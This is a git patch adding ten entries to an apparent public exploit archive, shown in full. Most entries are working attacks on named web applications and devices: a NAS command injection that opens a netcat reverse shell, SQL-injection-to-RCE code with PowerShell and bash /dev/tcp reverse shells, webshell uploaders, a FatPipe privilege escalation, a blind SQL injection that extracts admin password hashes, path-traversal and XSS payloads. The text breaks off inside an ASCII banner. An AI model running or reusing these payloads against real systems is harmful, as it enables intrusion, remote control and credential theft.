From 4f2cf56b3145f4ec8e579b56db663261c3bafd78 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 23 Oct 2021 05:02:09 +0000 Subject: [PATCH] DB: 2021-10-23 11 changes to exploits/shellcodes Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection OpenSIS 8.0 'modname' - Directory Traversal Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload Budget and Expense Tracker System 1.0 - Arbitrary File Upload FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting Jetty 9.4.37.v20210219 - Information Disclosure Clinic Management System 1.0 - SQL injection to Remote Code Execution Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated) Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes) --- exploits/hardware/webapps/50132.py | 29 +++ exploits/hardware/webapps/50341.txt | 118 +++++++++++ exploits/hardware/webapps/50342.py | 191 ++++++++++++++++++ exploits/java/webapps/50438.txt | 20 ++ exploits/php/webapps/50259.txt | 22 +++ exploits/php/webapps/50264.py | 78 ++++++++ exploits/php/webapps/50326.txt | 52 +++++ exploits/php/webapps/50350.txt | 13 ++ exploits/php/webapps/50439.py | 98 ++++++++++ exploits/php/webapps/50440.txt | 116 +++++++++++ files_exploits.csv | 10 + files_shellcodes.csv | 1 + shellcodes/windows_x86-64/50291.c | 290 ++++++++++++++++++++++++++++ 13 files changed, 1038 insertions(+) create mode 100755 exploits/hardware/webapps/50132.py create mode 100644 exploits/hardware/webapps/50341.txt create mode 100755 exploits/hardware/webapps/50342.py create mode 100644 exploits/java/webapps/50438.txt create mode 100644 exploits/php/webapps/50259.txt create mode 100755 exploits/php/webapps/50264.py create mode 100644 exploits/php/webapps/50326.txt create mode 100644 exploits/php/webapps/50350.txt create mode 100755 exploits/php/webapps/50439.py create mode 100644 exploits/php/webapps/50440.txt create mode 100644 shellcodes/windows_x86-64/50291.c diff --git a/exploits/hardware/webapps/50132.py b/exploits/hardware/webapps/50132.py new file mode 100755 index 000000000..4b2aa9629 --- /dev/null +++ b/exploits/hardware/webapps/50132.py @@ -0,0 +1,29 @@ +# Exploit Title: Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection +# Date: 15.07.2021 +# Discovered by: Jeroen - IT Nerdbox +# Exploit Author: Metin Yunus Kandemir +# Version: sg2000-2000.1331 +# Vendor Homepage: https://www.seagate.com/ +# Software Link: https://www.seagate.com/tr/tr/support/downloads/item/banas-220-firmware-master-dl/ + +#!/usr/bin/python3 + +import requests +import sys + +def exec(target, ncIp, ncPort): + print("[!] Please check netcat listener: "+ ncPort) + url = "http://" + target + "/backupmgt/localJob.php?session=fail;nc+"+ncIp+"+"+ncPort+"+-e+/bin/sh%00" + r = requests.get(url = url) + sys.exit(1) + +def main(args): + if len(args) != 4: + print("[*] usage: %s targetIp:port ncIp ncPort" % (args[0])) + print("[*] Example:python3 exploit.py 192.168.1.13 192.168.1.22 80") + sys.exit(1) + exec(target=args[1], ncIp=args[2], ncPort=args[3]) + + +if __name__ == "__main__": + main(args=sys.argv) \ No newline at end of file diff --git a/exploits/hardware/webapps/50341.txt b/exploits/hardware/webapps/50341.txt new file mode 100644 index 000000000..912ef064d --- /dev/null +++ b/exploits/hardware/webapps/50341.txt @@ -0,0 +1,118 @@ +# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access) +# Date: 25.07.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.fatpipeinc.com + +FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Hidden Backdoor Account (Write Access) + + +Vendor: FatPipe Networks Inc. +Product web page: https://www.fatpipeinc.com +Affected version: WARP / IPVPN / MPVPN + 10.2.2r38 + 10.2.2r25 + 10.2.2r10 + 10.1.2r60p82 + 10.1.2r60p71 + 10.1.2r60p65 + 10.1.2r60p58s1 + 10.1.2r60p58 + 10.1.2r60p55 + 10.1.2r60p45 + 10.1.2r60p35 + 10.1.2r60p32 + 10.1.2r60p13 + 10.1.2r60p10 + 9.1.2r185 + 9.1.2r180p2 + 9.1.2r165 + 9.1.2r164p5 + 9.1.2r164p4 + 9.1.2r164 + 9.1.2r161p26 + 9.1.2r161p20 + 9.1.2r161p17 + 9.1.2r161p16 + 9.1.2r161p12 + 9.1.2r161p3 + 9.1.2r161p2 + 9.1.2r156 + 9.1.2r150 + 9.1.2r144 + 9.1.2r129 + 7.1.2r39 + 6.1.2r70p75-m + 6.1.2r70p45-m + 6.1.2r70p26 + 5.2.0r34 + +Summary: FatPipe Networks invented the concept of router-clustering, +which provides the highest level of reliability, redundancy, and speed +of Internet traffic for Business Continuity and communications. FatPipe +WARP achieves fault tolerance for companies by creating an easy method +of combining two or more Internet connections of any kind over multiple +ISPs. FatPipe utilizes all paths when the lines are up and running, +dynamically balancing traffic over the multiple lines, and intelligently +failing over inbound and outbound IP traffic when ISP services and/or +components fail. + +FatPipe IPVPN balances load and provides reliability among multiple +managed and CPE based VPNs as well as dedicated private networks. FatPipe +IPVPN can also provide you an easy low-cost migration path from private +line, Frame or Point-to-Point networks. You can aggregate multiple private, +MPLS and public networks without additional equipment at the provider's +site. + +FatPipe MPVPN, a patented router clustering device, is an essential part +of Disaster Recovery and Business Continuity Planning for Virtual Private +Network (VPN) connectivity. It makes any VPN up to 900% more secure and +300% times more reliable, redundant and faster. MPVPN can take WANs with +an uptime of 99.5% or less and make them 99.999988% or higher, providing +a virtually infallible WAN. MPVPN dynamically balances load over multiple +lines and ISPs without the need for BGP programming. MPVPN aggregates up +to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed +you need to keep your VPN up and running despite failures of service, line, +software, or hardware. + +Desc: The application has a hidden administrative account 'cmuser' that has +no password and has write access permissions to the device. The user cmuser +is not visible in Users menu list of the application. + +Tested on: Apache-Coyote/1.1 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5684 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php + + +30.05.2016 +25.07.2021 + +-- + + +Overview: +FatPipe Central Manager is a secure web based solution providing a centralized solution +to manage FatPipe's suite of WAN reliability and optimization products. Central Manager +allows you to configure, manage and monitor FatPipe's patented MPSec technology at the +click of a button. + +Central Manager = cmuser. +Once authenticated, you get admin rights. + +HTTP/1.1 200 OK +Server: Apache-Coyote/1.1 +Strict-Transport-Security: max-age=31536000 +X-Frame-Options: DENY +X-Content-Type-Options: nosniff +X-XSS-Protection: 1; mode=block +Content-Type: application/json;charset=ISO-8859-1 +Content-Length: 118 +Date: Fri, 06 Aug 2017 16:37:07 GMT +Connection: close + +{"loginRes":"success","userName":"userName","userAccess":"writeAccess","activeUserName":"cmuser","message":"noError"} \ No newline at end of file diff --git a/exploits/hardware/webapps/50342.py b/exploits/hardware/webapps/50342.py new file mode 100755 index 000000000..c2109cdc1 --- /dev/null +++ b/exploits/hardware/webapps/50342.py @@ -0,0 +1,191 @@ +# Exploit Title: FatPipe Networks MPVPN 10.2.2 - Remote Privilege Escalation +# Date: 25.07.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.fatpipeinc.com + +#!/usr/bin/env python3 +# +# +# FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation +# +# +# Vendor: FatPipe Networks Inc. +# Product web page: https://www.fatpipeinc.com +# Affected version: WARP / IPVPN / MPVPN +# 10.2.2r38 +# 10.2.2r25 +# 10.2.2r10 +# 10.1.2r60p82 +# 10.1.2r60p71 +# 10.1.2r60p65 +# 10.1.2r60p58s1 +# 10.1.2r60p58 +# 10.1.2r60p55 +# 10.1.2r60p45 +# 10.1.2r60p35 +# 10.1.2r60p32 +# 10.1.2r60p13 +# 10.1.2r60p10 +# 9.1.2r185 +# 9.1.2r180p2 +# 9.1.2r165 +# 9.1.2r164p5 +# 9.1.2r164p4 +# 9.1.2r164 +# 9.1.2r161p26 +# 9.1.2r161p20 +# 9.1.2r161p17 +# 9.1.2r161p16 +# 9.1.2r161p12 +# 9.1.2r161p3 +# 9.1.2r161p2 +# 9.1.2r156 +# 9.1.2r150 +# 9.1.2r144 +# 9.1.2r129 +# 7.1.2r39 +# 6.1.2r70p75-m +# 6.1.2r70p45-m +# 6.1.2r70p26 +# 5.2.0r34 +# +# Summary: FatPipe Networks invented the concept of router-clustering, +# which provides the highest level of reliability, redundancy, and speed +# of Internet traffic for Business Continuity and communications. FatPipe +# WARP achieves fault tolerance for companies by creating an easy method +# of combining two or more Internet connections of any kind over multiple +# ISPs. FatPipe utilizes all paths when the lines are up and running, +# dynamically balancing traffic over the multiple lines, and intelligently +# failing over inbound and outbound IP traffic when ISP services and/or +# components fail. +# +# FatPipe IPVPN balances load and provides reliability among multiple +# managed and CPE based VPNs as well as dedicated private networks. FatPipe +# IPVPN can also provide you an easy low-cost migration path from private +# line, Frame or Point-to-Point networks. You can aggregate multiple private, +# MPLS and public networks without additional equipment at the provider's +# site. +# +# FatPipe MPVPN, a patented router clustering device, is an essential part +# of Disaster Recovery and Business Continuity Planning for Virtual Private +# Network (VPN) connectivity. It makes any VPN up to 900% more secure and +# 300% times more reliable, redundant and faster. MPVPN can take WANs with +# an uptime of 99.5% or less and make them 99.999988% or higher, providing +# a virtually infallible WAN. MPVPN dynamically balances load over multiple +# lines and ISPs without the need for BGP programming. MPVPN aggregates up +# to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed +# you need to keep your VPN up and running despite failures of service, line, +# software, or hardware. +# +# Desc: The application suffers from a privilege escalation vulnerability. +# A normal user (group USER, 0) can elevate her privileges by sending a HTTP +# POST request and setting the JSON parameter 'privilege' to integer value +# '1' gaining administrative rights (group ADMINISTRATOR, 1). +# +# Tested on: Apache-Coyote/1.1 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2021-5685 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5685.php +# +# +# 30.05.2016 +# 25.07.2021 +# +# + +import sys +import time####### +import requests################ +requests.packages.urllib3.disable_warnings() + +if len(sys.argv) !=2: + print + print("********************************************************") + print("* *") + print("* Privilege escalation from USER to ADMINISTRATOR role *") + print("* in *") + print("* FatPipe WARP/IPVPN/MPVPN v10.2.2 *") + print("* *") + print("* ZSL-2021-5685 *") + print("* *") + print("********************************************************") + print("\n[POR] Usage: ./escalator.py [IP]") + sys.exit() + +ajpi=sys.argv[1] +print +juzer=raw_input("[UNE] Username: ") +pasvord=raw_input("[UNE] Password: ") + +sesija=requests.session() +logiranje={'loginParams':'{\"username\":\"'+juzer+'\",\"password\":\"'+pasvord+'\",\"authType\":0}'} + +hederi={'Sec-Ch-Ua' :'\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"92\"', + 'Accept' :'application/json, text/javascript, */*; q=0.01', + 'X-Requested-With':'XMLHttpRequest', + 'Sec-Ch-Ua-Mobile':'?0', + 'User-Agent' :'Fatnet/1.b', + 'Content-Type' :'application/x-www-form-urlencoded; charset=UTF-8', + 'Origin' :'https://'+ajpi, + 'Sec-Fetch-Site' :'same-origin', + 'Sec-Fetch-Mode' :'cors', + 'Sec-Fetch-Dest' :'empty', + 'Referer' :'https://'+ajpi+'/fpui/dataCollectionServlet', + 'Accept-Encoding' :'gzip, deflate', + 'Accept-Language' :'en-US,en;q=0.9', + 'Connection' :'close'} + +juarel1='https://'+ajpi+'/fpui/loginServlet' +alo=sesija.post(juarel1,headers=hederi,data=logiranje,verify=False) + +if not 'success' in alo.text: + print('[GRE] Login error.') + sys.exit() +else: + print('[POR] Authentication successful.') + +print('[POR] Climbing the ladder...') + +sluba=''' +|| || .--._ +||====|| __ '---._) +|| ||"")\ Q Q ) +||====|| =_/ o / +|| || | \_.-;-'-,._ +||====|| | ' o---o ) +|| || \ /H __H\ / +||====|| '-' \"")\/ | +|| || _ |_='-)_/ +||====|| / '. ) +|| || / / +||====|| |___/\| / +|| || |_| | | +||====|| / ) \\ \\ +|| || (__/ \___\\ +||====|| \_\\ +|| || / ) +||====|| (__/ +''' + +for k in sluba: + sys.stdout.write(k) + sys.stdout.flush() + time.sleep(0.01) + +juarel2='https://'+ajpi+'/fpui/userServlet?loadType=set&block=userSetRequest' +posta={ +'userList':'[{\"userName\":\"'+juzer+'\",\"oldUserName\":\"'+juzer+'\",\"privilege\":\"1\",\"password\":\"'+pasvord+'\",\"action\":\"edit\",\"state\":false}]' +} +stanje=sesija.post(juarel2,headers=hederi,data=posta,verify=False) + +if not 'true' in stanje.text: + print('\n[GRE] Something\'s fishy!') + sys.exit() +else: + print('\n[POR] You are now authorized not only to view settings, but to modify them as well. Yes indeed.') + sys.exit() \ No newline at end of file diff --git a/exploits/java/webapps/50438.txt b/exploits/java/webapps/50438.txt new file mode 100644 index 000000000..6e1381860 --- /dev/null +++ b/exploits/java/webapps/50438.txt @@ -0,0 +1,20 @@ +# Exploit Title: Jetty 9.4.37.v20210219 - Information Disclosure +# Date: 2021-10-21 +# Exploit Author: Mayank Deshmukh +# Vendor Homepage: https://www.eclipse.org/jetty/ +# Software Link: https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/9.4.37.v20210219/ +# Version: 9.4.37.v20210219 and 9.4.38.v20210224 +# Tested on: Kali Linux +# CVE : CVE-2021-28164 + +POC #1 - web.xml + +GET /%2e/WEB-INF/web.xml HTTP/1.1 +Host: localhost:8080 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 \ No newline at end of file diff --git a/exploits/php/webapps/50259.txt b/exploits/php/webapps/50259.txt new file mode 100644 index 000000000..0ac46e09c --- /dev/null +++ b/exploits/php/webapps/50259.txt @@ -0,0 +1,22 @@ +# Exploit Title: OpenSIS 8.0 'modname' - Directory/Path Traversal +# Date: 09-02-2021 +# Exploit Author: Eric Salario +# Vendor Homepage: http://www.os4ed.com/ +# Software Link: https://opensis.com/download +# Version: 8.0 +# Tested on: Windows, Linux +# CVE: CVE-2021-40651 + +The 'modname' parameter in the 'Modules.php' is vulnerable to local file inclusion vulnerability. This vulnerability can be exploited to expose sensitive information from arbitrary files in the underlying system. + +To exploit the vulnerability, someone must login as the "Parent" user, navigate to http://localhost/Modules.php?modname=miscellaneous%2fPortal.php. The 'modname' parameter and requests the Portal.php's contents. By going back a few directory using '..%2f' decoded as '../' it was possible to disclose arbitrary file from the server's filesystem as long as the application has access to the file. + +1. Login as "Parent" + +2. Open a web proxy such as BurpSuite and capture the requests + +3. Navigate to http://localhost/Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login= + +4. Check the response + +PoC: https://youtu.be/wFwlbXANRCo \ No newline at end of file diff --git a/exploits/php/webapps/50264.py b/exploits/php/webapps/50264.py new file mode 100755 index 000000000..28eae8ba2 --- /dev/null +++ b/exploits/php/webapps/50264.py @@ -0,0 +1,78 @@ +# Exploit Title: Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload +# Date: 03/09/2021 +# Exploit Author: a-rey +# Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14928 +# Version: v1.0 +# Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0 +# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +import os +import time +import logging +import requests +import argparse + +BANNER = """ +╔═════════════════════════════════════════════════════════════════════════════════════════════════╗ +║ Patient Appointment Scheduler System v1.0 - Unauthenticated File Upload & Remote Code Execution ║ +╚═════════════════════════════════════════════════════════════════════════════════════════════════╝ + by: \033[0m\033[1;31m █████╗ ██████╗ ███████╗██╗ ██╗\033[0m + \033[0m\033[1;32m██╔══██╗ ██╔══██╗██╔════╝██║ ██║\033[0m + \033[0m\033[1;33m███████║ ███ ██████╔╝█████╗ ██╗ ██═╝\033[0m + \033[0m\033[1;34m██╔══██║ ██╔══██╗██╔══╝ ██╔╝ \033[0m + \033[0m\033[1;35m██║ ██║ ██║ ██║███████╗ ██║ \033[0m + \033[0m\033[1;36m╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ \033[0m +""" + + +def exploit(url:str, file:str, delay:int) -> None: + if not os.path.exists(file): + logging.error(f'webshell payload "{file}"" does not exist?') + return + logging.info(f'uploading webshell payload "{os.path.basename(file)}" to {url}/uploads ...') + uploadTime = int(time.time()) + r = requests.post(url + '/classes/SystemSettings.php', + files={'img' : (os.path.basename(file), open(file, 'rb'))}, # NOTE: can also use 'cover' field, but this is more inconspicuous + params={'f' : 'update_settings'}, + verify=False + ) + if not r.ok: + logging.error('HTTP upload request failed') + return + logging.info(f'finding new payload file name on target (+/- {delay} seconds) ...') + for i in range(uploadTime - delay, uploadTime + delay + 1): + r = requests.get(url + f'/uploads/{str(i)}_{os.path.basename(file)}', allow_redirects=False) + logging.debug(f'trying {url}/uploads/{str(i)}_{os.path.basename(file)} ...') + # NOTE: website will send redirects for all files that do not exist + if r.status_code != 302: + logging.success(f'webshell payload found on target at {url}/uploads/{str(i)}_{os.path.basename(file)}') + return + logging.error('failed to find payload on target') + logging.warning('maybe need a larger delay or uploads directory is not writable?') + return + + +if __name__ == '__main__': + # parse arguments + parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER) + parser.add_argument('-u', '--url', help='website URL', type=str, required=True) + parser.add_argument('-p', '--payload', help='PHP webshell file to upload', type=str, required=True) + parser.add_argument('-d', '--delay', help='delay (seconds) for file timestamp in payload name on target', type=int, required=False, default=60) + parser.add_argument('--debug', help='enable debugging output', action='store_true', default=False) + args = parser.parse_args() + # define logger + logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO' if not args.debug else 'DEBUG') + logging.SUCCESS = logging.CRITICAL + 1 + logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m') + logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m') + logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m') + logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m') + logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args) + # print banner + print(BANNER) + # run exploit + exploit(args.url, args.payload, args.delay) \ No newline at end of file diff --git a/exploits/php/webapps/50326.txt b/exploits/php/webapps/50326.txt new file mode 100644 index 000000000..bfb9ee9a3 --- /dev/null +++ b/exploits/php/webapps/50326.txt @@ -0,0 +1,52 @@ +# Exploit Title: Budget and Expense Tracker System 1.0 - Arbitrary File Upload +# Exploit Author: ()t/\/\1 +# Date: 23/09/2021 +# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html +# Tested on: Linux +# Version: 2.0 + +# Exploit Description: +The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands. + + +# PoC request + +POST /expense_budget/classes/Users.php?f=save HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/expense_budget/admin/?page=user +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------1399170066243244238234165712 +Content-Length: 824 +Connection: close +Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c + +-----------------------------1399170066243244238234165712 +Content-Disposition: form-data; name="id" + +1 +-----------------------------1399170066243244238234165712 +Content-Disposition: form-data; name="firstname" + +A +-----------------------------1399170066243244238234165712 +Content-Disposition: form-data; name="lastname" + +a +-----------------------------1399170066243244238234165712 +Content-Disposition: form-data; name="username" + +admin +-----------------------------1399170066243244238234165712 +Content-Disposition: form-data; name="password" + + +-----------------------------1399170066243244238234165712 +Content-Disposition: form-data; name="img"; filename="na3na3.php" +Content-Type: image/jpeg + +";system($_GET['cmd']); ?> +-----------------------------1399170066243244238234165712-- \ No newline at end of file diff --git a/exploits/php/webapps/50350.txt b/exploits/php/webapps/50350.txt new file mode 100644 index 000000000..e27954ca5 --- /dev/null +++ b/exploits/php/webapps/50350.txt @@ -0,0 +1,13 @@ +# Exploit Title: WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS) +# Date: 2/3/2021 +# Author: 0xB9 +# Software Link: https://downloads.wordpress.org/plugin/redirect-404-to-parent.1.3.0.zip +# Version: 1.3.0 +# Tested on: Windows 10 +# CVE: CVE-2021-24286 + +1. Description: +This plugin redirects any 404 request to the parent URL. The tab parameter in the Admin Panel is vulnerable to XSS. + +2. Proof of Concept: +wp-admin/options-general.php?page=moove-redirect-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/); \ No newline at end of file diff --git a/exploits/php/webapps/50439.py b/exploits/php/webapps/50439.py new file mode 100755 index 000000000..abc88f87f --- /dev/null +++ b/exploits/php/webapps/50439.py @@ -0,0 +1,98 @@ +# Exploit Title: Clinic Management System 1.0 - SQL injection to Remote Code Execution +# Date:21/10/2021 +# Exploit Author: Pablo Santiago +# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip +# Version: 1.0 +# Tested on: Windows 7 and Ubuntu 21.10 +# References: https://medium.com/@Pablo0xSantiago/clinic-management-system-1-0-sql-injection-bypass-to-remote-code-execution-804bceac037e + +# Vulnerability: Through SQL injection to bypass the login form it is +possible to upload a malicious file and after use that malicious file to +execute code in the remote system. +# Proof of Concept: + +import requests +import sys +import time + + +session = requests.Session() +#http_proxy = "http://127.0.0.1:8080" +#https_proxy = "https://127.0.0.1:8080" + +#proxyDict = {"http" : http_proxy, +# "https" : https_proxy} + +def windows(HPW,host,shell_name): +payload = +"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()""""" +host2 = host+'/'+'uploadImage/Logo/' + shell_name + '.php?cmd='+payload +#print(payload) +try: +request_rce = requests.get(host2,timeout=8) +except requests.exceptions.ReadTimeout: +pass + + +def linux(HPL,host,shell_name): +payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+HPL+'+0>%261"' +host2 = host+'/'+'/uploadImage/Logo/' + shell_name + '.php?cmd='+payload +#print(payload) +try: +request_rce = requests.get(host2,timeout=8) +except requests.exceptions.ReadTimeout: +pass + +def main(): + +host = sys.argv[1] +shell_name = sys.argv[2] +url = host + '/login.php' +values = {'user': "admin", + 'email': "' OR 1 -- -", + 'password': '', + 'btn_login': "" + } + +r = session.post(url, data=values) +cookie = session.cookies.get_dict()['PHPSESSID'] + +data = { 'btn_web':''} +headers= {'Cookie': 'PHPSESSID='+cookie} + + + +request = session.post(host+ '/manage_website.php', data=data, +headers=headers,files={"website_image":(shell_name+'.php',"")}) +print("") +print('[*] Your Simple Webshell was uploaded to ' + host + +'/uploadImage/Logo/' + shell_name + '.php' ) +print("") +LHOST = input('[+] Enter your LHOST: ') +LPORT = input('[+] Enter your LPORT: ') +print("") +HPW= "'"+LHOST+"'"+','+LPORT +HPL= ""+LHOST+""+'/'+LPORT + +print('[+] Option 1: Windows') +print('[+] Option 2: Linux') + +option = input('[+] Choose OS: ') + +if option == "1": + +windows(HPW,host,shell_name) +exit() + +elif option == "2": +linux(HPL,host,shell_name) +exit() + +else: +print("Please choose Windows or Linux") + +main() + +#Usage: python3 host shell_name +#Example: python3 http://localhost/clinic shell \ No newline at end of file diff --git a/exploits/php/webapps/50440.txt b/exploits/php/webapps/50440.txt new file mode 100644 index 000000000..5cc214d29 --- /dev/null +++ b/exploits/php/webapps/50440.txt @@ -0,0 +1,116 @@ +# Exploit Title: Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated) +# Exploit Author: Sam Ferguson (@AffineSecurity) and Drew Jones (@qhum7sec) +# Date: 2021-10-21 +# Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip +# Version: 1.0 +# Tested On: Windows 10 + XAMPP + Python 3 + +# Vulnerability: An attacker can perform a blind boolean-based SQL injection attack, which can provide attackers +# with access to the username and md5 hash of any administrators. +# Vulnerable file: /online-course-registration/Online/pincode-verification.php +# Proof of Concept: + +#!/usr/bin/python3 + +import requests +import sys +import string + +def exploit(hostname, username, password): + + # Building bruteforce list + pass_list = list(string.ascii_lowercase) + pass_list += list(range(0,10)) + pass_list = map(str, pass_list) + pass_list = list(pass_list) + + user_list = pass_list + user_list += list(string.ascii_uppercase) + user_list = map(str, user_list) + user_list = list(user_list) + + session = requests.Session() + + # This URL may change based on the implementation - change as needed + url = f"{hostname}/online-course-registration/Online/index.php" + headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/index.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"} + data = {"regno": f"{username}", "password": f"{password}", "submit": ''} + r = session.post(url, headers=headers, data=data) + + + print("Admin username:") + # This range number is pretty arbitrary, so change it to whatever you feel like + for i in range(1,33): + counter = 0 + find = False + for j in user_list: + # This URL may change based on the implementation - change as needed + url = f"{hostname}/online-course-registration/Online/pincode-verification.php" + headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/pincode-verification.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"} + data = {"pincode": f"' or (select(select (substring(username,{i},1)) from admin) = \"{j}\") -- - #", "submit": ''} + a = session.post(url, headers=headers, data=data) + counter += 1 + if 'Course Enroll' in a.text: + sys.stdout.write(j) + sys.stdout.flush() + break + elif counter == len(user_list): + find = True + break + if find: + break + + print("\n") + print("Admin password hash:") + # This range is not arbitrary and will cover md5 hashing - if the hashing implementation is different, change as needed + for i in range(1,33): + counter = 0 + find = False + for j in pass_list: + url = f"{hostname}/online-course-registration/Online/pincode-verification.php" + headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/pincode-verification.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"} + data = {"pincode": f"' or (select(select (substring(password,{i},1)) from admin) = \"{j}\") -- - #", "submit": ''} + a = session.post(url, headers=headers, data=data) + counter += 1 + if 'Course Enroll' in a.text: + sys.stdout.write(j) + sys.stdout.flush() + break + elif counter == len(pass_list): + find = True + break + if find: + break + + print("\n\nSuccessfully pwnd :)") + +def logo(): + art = R''' +__/\\\\\\\\\\\\\____/\\\\\\\\\\\__/\\\\\_____/\\\__/\\\\_________/\\\__ + 